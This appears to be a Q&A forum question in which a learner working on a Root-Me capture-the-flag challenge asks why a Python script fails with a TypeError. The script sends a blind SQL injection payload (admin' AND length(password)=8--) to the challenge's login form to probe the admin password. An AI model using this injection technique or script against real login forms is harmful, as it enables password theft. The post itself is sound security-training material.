# Python expected string or bytes-like object with request

Tags: sql, python-3.x, request, sql-injection

I'm currently trying a challenge for: *find an administrator password by blind injection sql*.

There is a form with username and password field. Username is usable. I'd like not to spoil the challenge but I found the length of the admin password. And, as I'm learning python and I would like to script the test for find password, I made this script.

By this script I want to inject/brute force in username field:

```
admin' AND length(password)=8--
```

Then I need to read the html content for find the string `"username : admin"` and if it's here, display that its ok.
My environment is `Python 3.5`.

```
import urllib
import urllib.parse
import urllib.request
import re

#try password
url = 'http://challenge01.root-me.org/web-serveur/ch10/'
values = {'username' : 'admin\' AND lentgh(password)=8',
      'password' : 'test123'}

data = urllib.parse.urlencode(values)
data = data.encode(encoding="utf-8")
req = urllib.request.Request(url, data)
response = urllib.request.urlopen(req)

#read and stock html content
html_content = urllib.request.urlopen('http://challenge01.root-me.org/web-serveur/ch10/').read()
matches = re.findall(r'username : admin', response)

if len(matches) == 0:
   print ('There is a problem with the SQL request')
else:
   print ('the lentgh is : ')
```

But i have an error when I execute the script :

```
Traceback (most recent call last):
File "E:/OneDrive/Programmation/Prgorammation Python/untitled   /bruteforcemp.py", line 19, in <module>
matches = re.findall(r'username : admin', response)
File "C:\Program Files (x86)\Python35-32\lib\re.py", line 213, in findall
return _compile(pattern, flags).findall(string)
TypeError: expected string or bytes-like object
```

I'm little confused. I would really appreciate your help! Thank you in advance.

Comment: (i would like to precise that i know the script is useless because i already know the lentgh but it's only for test if the script can work like that after i could make a loop to try the lentgh)